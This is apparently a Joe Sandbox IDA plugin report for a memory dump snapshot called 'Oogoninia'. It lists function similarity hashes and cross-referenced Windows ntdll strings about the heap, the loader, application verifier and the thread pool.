                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                    • API String ID: 0-2224505338
                                                                                                                                                                                    • Opcode ID: 350b044d483f89b02dbf55aaed49591e4f28d78678f56d23218ffca07d6e16b7
                                                                                                                                                                                    • Instruction ID: cb16ade40c648f3d299709d5adcbb9555732e4c6eb6b5ae130651ca1de81ef28
                                                                                                                                                                                    • Opcode Fuzzy Hash: 350b044d483f89b02dbf55aaed49591e4f28d78678f56d23218ffca07d6e16b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8651E436601254EFEB15DF94C884F5A77E4EF487A4F1188A7F401DB229DA71EB40CE11
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • VerifierDlls, xrefs: 325A893D
                                                                                                                                                                                    • HandleTraces, xrefs: 325A890F
                                                                                                                                                                                    • VerifierFlags, xrefs: 325A88D0
                                                                                                                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 325A880F
                                                                                                                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 325A86BD
                                                                                                                                                                                    • VerifierDebug, xrefs: 325A8925
                                                                                                                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 325A86E7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                    • API String ID: 0-3223716464
                                                                                                                                                                                    • Opcode ID: d29726ce16c81dcba471c1771d8f22ac3983c116f36657bd66a95a427a509c67
                                                                                                                                                                                    • Instruction ID: c752ebb57286d435c7f3318a0bbdba674c2bad96d22680185af92a2de52a453e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d29726ce16c81dcba471c1771d8f22ac3983c116f36657bd66a95a427a509c67
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50913472542352AFE316CF24D9A9B1EBB94AF88728F844C59F9406B340CB70BF45CB91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 3258A7AF
                                                                                                                                                                                    • LdrpDynamicShimModule, xrefs: 3258A7A5
                                                                                                                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3258A79F
                                                                                                                                                                                    • DGO2, xrefs: 32542382
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: DGO2$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 0-4212057674
                                                                                                                                                                                    • Opcode ID: c4e0ce1b149723ced6904872dff10e7bd99943b4b78f4a1cf346a9e7d941a83e
                                                                                                                                                                                    • Instruction ID: a77513ffdf86bec5971f288e8a10c3c069b926ffb698a9ebdeec9109962bd3cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: c4e0ce1b149723ced6904872dff10e7bd99943b4b78f4a1cf346a9e7d941a83e
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6310575A51240BFF7149F18C895A5EBBB4EFC8754F14445AE901E7240DAB07AC2CF90
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                    • API String ID: 0-523794902
                                                                                                                                                                                    • Opcode ID: 8119efa140e1f42a7c07aa9a55566f4267f0142c19d5a8f82c21809ff4549977
                                                                                                                                                                                    • Instruction ID: 573bc36cb57e503c54b5edb859dbfd3f452d40c3b65c69a92d1affbe21035c9c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8119efa140e1f42a7c07aa9a55566f4267f0142c19d5a8f82c21809ff4549977
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E4224752457819FEB05CF28C884B2ABBE5FF88348F44496DE885CB352DB74EA41CB52
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.T2
                                                                                                                                                                                    • API String ID: 0-2417481782
                                                                                                                                                                                    • Opcode ID: a1849e84d291ccd46703f2ecbe5668d848c256f93e4e043baa05e6b4c52b0011
                                                                                                                                                                                    • Instruction ID: cce16498ad9fc57942cb03f4bc24c08a17138a31908974fb606196c7e6178e60
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1849e84d291ccd46703f2ecbe5668d848c256f93e4e043baa05e6b4c52b0011
                                                                                                                                                                                    • Instruction Fuzzy Hash: BDF12BB6D01219EFDB05CF94C940AEEBBBCEF58754F50446AE515E7210EEB49B01CBA0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
  • API ID:
  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
  • API String ID: 0-122214566
  • Opcode ID: ce599706f3d027fa69ff67153cc306a1c1e8a827de78d49ce9127b8c6d99da38
  • Instruction ID: f8680f00e5e99900361903b7d8a59558564bb5be5d031e4e12c905cf921e05fa
  • Opcode Fuzzy Hash: ce599706f3d027fa69ff67153cc306a1c1e8a827de78d49ce9127b8c6d99da38
  • Instruction Fuzzy Hash: C7C12975B02359ABEB068B64C890BBE7B61EF85304F546169EE02DB290DFB4DF44C391
Strings
Memory Dump Source
  • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
  • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
  • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
  • API ID:
  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
  • API String ID: 0-792281065
  • Opcode ID: c8d2f1a198015ac8a123e956dfe6979107ac4a264ce3029db1fa107824137153
  • Instruction ID: 99bc74efcbebd82f5401d6d18405dcfd7a7749a1ee255a9c9192084b475784f2
  • Opcode Fuzzy Hash: c8d2f1a198015ac8a123e956dfe6979107ac4a264ce3029db1fa107824137153
  • Instruction Fuzzy Hash: D7916A74A43395EBE715CF10C954BEE7BA0EF85794F50446AE911AB2C0CBB47B81CB90
APIs
Strings
Memory Dump Source
  • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
  • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
  • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
  • API ID: DebugPrintTimes
  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
  • API String ID: 3446177414-2283098728
  • Opcode ID: a3f8c084f036b477fdd8182a62bfa74608d2437fb47fe67c852b283c0a79f5f5
  • Instruction ID: 62426b8a1ffb4435c84b9a5d247e9c539e1a1b53409b6ed7d6345f38a0fda126
  • Opcode Fuzzy Hash: a3f8c084f036b477fdd8182a62bfa74608d2437fb47fe67c852b283c0a79f5f5
  • Instruction Fuzzy Hash: 21512475609701ABE715DF38C886F19FBA0BFC9324F540A6DE95197281DFB0BA41CB82
APIs
Strings
  • Failed to reallocate the system dirs string !, xrefs: 325980E2
  • minkernel\ntdll\ldrinit.c, xrefs: 325980F3
  • LdrpInitializePerUserWindowsDirectory, xrefs: 325980E9
Memory Dump Source
  • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
  • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
  • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
  • API ID: DebugPrintTimes
  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
  • API String ID: 3446177414-1783798831
  • Opcode ID: f74dc31b651850719d29697a569563f6cedcb20d392742d6ce34668a1765e5de
  • Instruction ID: 636afdf1c7ab49bd6ad6ab56caac2db5a8ffccfd1c50fc0714d7f1860f4dd81d
  • Opcode Fuzzy Hash: f74dc31b651850719d29697a569563f6cedcb20d392742d6ce34668a1765e5de
  • Instruction Fuzzy Hash: 8B4102B9552300ABD711DF28DC40B5F7BE8AF88750F50582BB949E7250EB70FA85CB92
APIs
Strings
  • LdrpCheckRedirection, xrefs: 325A450F
  • minkernel\ntdll\ldrredirect.c, xrefs: 325A4519
  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 325A4508
Memory Dump Source
  • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
  • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
  • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
  • API ID: DebugPrintTimes
  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
  • API String ID: 3446177414-3154609507
  • Opcode ID: d702bcb0aa80ef42643d179180c38188154640df961420301c3537f879e4171c
  • Instruction ID: 38e932ba5a4c2e47a0208ec88538e5df106688f1e970491a50812039ece1c5fd
  • Opcode Fuzzy Hash: d702bcb0aa80ef42643d179180c38188154640df961420301c3537f879e4171c
  • Instruction Fuzzy Hash: F04113766053119FDB12CFD8C861A1E7BE4AF88756F050A5AEC98D7311DB31EE40CB91
APIs
Memory Dump Source
  • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
  • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
  • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
  • API ID: DebugPrintTimes
  • String ID:
  • API String ID: 3446177414-0
  • Opcode ID: f13f53c820eed97cb05aaeea0161ea436deb1d777517c5d0d14852949364d55d
  • Instruction ID: 58cd7f3580c682ae907704193622a02c1b8e75e03f804f5dfc6634b55be21120
  • Opcode Fuzzy Hash: f13f53c820eed97cb05aaeea0161ea436deb1d777517c5d0d14852949364d55d
  • Instruction Fuzzy Hash: D8F1E777E00615EFCB18CF68C99067EBFF5AF88240B59416DD856DB380EA35EA41CB50
Strings
Memory Dump Source
  • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
  • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
  • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
  • API ID:
  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
  • API String ID: 0-3061284088
  • Opcode ID: 2d129dfe5028489c52be4ed23cbedcf7a81ed2dbcac6c797aebe8ff2ad8feaeb
  • Instruction ID: c29489a65ebb4ecb228871466c5d903de0f8d6605b5fb96fd2aa79e7bb2792ac
  • Opcode Fuzzy Hash: 2d129dfe5028489c52be4ed23cbedcf7a81ed2dbcac6c797aebe8ff2ad8feaeb
  • Instruction Fuzzy Hash: 8D017B36145280BFF309832CE408F867BA4DFC6731F25488AE0004BA90CEABBB81D960
Strings
Memory Dump Source
  • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
  • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
  • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
  • API ID:
  • String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
  • API String ID: 0-2084224854
  • Opcode ID: 92df14dd901cec037e0749b7fbd5a8eef2c14429c36801127f9b85e90c3951a8
  • Instruction ID: f832ef71eb61f7f68a767640389a8dbabca05cdf2b9dff000178ba360071e479
  • Opcode Fuzzy Hash: 92df14dd901cec037e0749b7fbd5a8eef2c14429c36801127f9b85e90c3951a8
  • Instruction Fuzzy Hash: ABE1DF74A043459FEB18CF68C490B7BBBE5AF48714F54C859E896CB2C6EB34EA41CB50
APIs
Strings
  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32520586
  • kLsE, xrefs: 325205FE
Memory Dump Source
  • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
  • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
  • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
  • API ID: DebugPrintTimes
  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
  • API String ID: 3446177414-2547482624
  • Opcode ID: e56cb698694f4e884034f68933cde1d0d7f419cc1cabfcfd81a962cec7603edd
  • Instruction ID: a32005b4e905cad8e5f9aa71504d47f82b27833e0fc434ea50bb036895de5e07
  • Opcode Fuzzy Hash: e56cb698694f4e884034f68933cde1d0d7f419cc1cabfcfd81a962cec7603edd
  • Instruction Fuzzy Hash: 6C51A1B6A02745DFE714DFA4C4447AABBF8AF54304F00883ED595972C0EB74AB45CBA1
Strings
Memory Dump Source
  • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
  • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
  • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                    • API String ID: 0-379654539
                                                                                                                                                                                    • Opcode ID: cf45ac179daf060b035290cefbf2dbfe843b10fea3adc948aa1367f7bfb0bf87
                                                                                                                                                                                    • Instruction ID: 7e020f3288e07433812853c5de64603db925bd0378dde274b4886a1c26940051
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf45ac179daf060b035290cefbf2dbfe843b10fea3adc948aa1367f7bfb0bf87
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5C17B74218382CFE715CF18C540B5ABBE4BF84744F40496AF995CB2D0EBB4CA49CB92
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3255847E
                                                                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 32558341
                                                                                                                                                                                    • LdrpInitializeProcess, xrefs: 32558342
                                                                                                                                                                                    • @, xrefs: 325584B1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 0-1918872054
                                                                                                                                                                                    • Opcode ID: 94e80f537561b12b6fb5dcaa46bf97acad02bd98ba054343b4208ddb8275ec57
                                                                                                                                                                                    • Instruction ID: af25583538e1ee17bb28dfd1759521e169160254bd771778c84e32845fc36d01
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94e80f537561b12b6fb5dcaa46bf97acad02bd98ba054343b4208ddb8275ec57
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2918F71509345EFE321CE20D944FABBBECAF84788F80492EFA89D2150E775DA44CB52
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 32591FE8
                                                                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 325920C0
                                                                                                                                                                                    • .Local, xrefs: 325527F8
                                                                                                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32591FE3, 325920BB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                    • API String ID: 0-1239276146
                                                                                                                                                                                    • Opcode ID: ba2ebee62b998a4a204055e4e4641ab7cb0821397be53257c10302501a7c6dd3
                                                                                                                                                                                    • Instruction ID: b6ead4bae56f1571780b4ba647c5768977b92d2d0bf021700ada85893edfd347
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba2ebee62b998a4a204055e4e4641ab7cb0821397be53257c10302501a7c6dd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: F8A1CE759013299BDB24CFA4CC84B99B7B0BF58358F6005EAD809EB255DB74AF81CF90
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}P2
                                                                                                                                                                                    • API String ID: 0-3663656162
                                                                                                                                                                                    • Opcode ID: 101ca724fc5b41bd4934992465d5b0c35a51194b82710ea8fa1b5ab18edbbeff
                                                                                                                                                                                    • Instruction ID: 3eb05a3053aa586c6c7416a7320ac2b70b90528831075879b294fc43a5651cf4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 101ca724fc5b41bd4934992465d5b0c35a51194b82710ea8fa1b5ab18edbbeff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67818D71619340AFEB11CB14C944B6BBBE8EF94754F44096DF980EB290DBB5DE04CBA2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: LUO2$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                    • API String ID: 0-2805539372
                                                                                                                                                                                    • Opcode ID: 3b5cdd740adb9a719279f0ed4a5bfc1de9a76c00d3e3edb35a63e42559783680
                                                                                                                                                                                    • Instruction ID: 942622f88822dace48c725113a7fbcbd5a5d78d86744dcb5905a066855b30ce4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b5cdd740adb9a719279f0ed4a5bfc1de9a76c00d3e3edb35a63e42559783680
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D91DD75A04349DFEB15CF58D45079EBBB4EF14368F144599E814AB2D0EBB89F80CB90
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32580EB5
                                                                                                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32580DEC
                                                                                                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32580E72
                                                                                                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32580E2F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                    • API String ID: 0-1468400865
                                                                                                                                                                                    • Opcode ID: fa3b86825f552bb6f958a467f982d5fea663e17c7b0cdd1bc9e85022ee06a1ec
                                                                                                                                                                                    • Instruction ID: 49118ea9bf8751f3a1424126a5f9110b4a569ba509a8e7386853d7fb6a05a0c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa3b86825f552bb6f958a467f982d5fea663e17c7b0cdd1bc9e85022ee06a1ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC71C1B19053449FD750CF14C8C5B8B7FA8AF847A4F800969FD888B286D7B5E688CBD1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                    • API String ID: 2994545307-1391187441
                                                                                                                                                                                    • Opcode ID: 51e036047b3d66ed11fc2df99d29a64a0b30cf748453c5ebf8bd2c9c55ec9ee9
                                                                                                                                                                                    • Instruction ID: d30b94ee3eec5dde7cdef9ae6dab07b2c7baefefc42e48907f78563c5570389f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e036047b3d66ed11fc2df99d29a64a0b30cf748453c5ebf8bd2c9c55ec9ee9
                                                                                                                                                                                    • Instruction Fuzzy Hash: FC31F936940104EFEB01CB98DC84F9AB7B8EF84770F5144A1E815AB250DB70EB41CE60
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
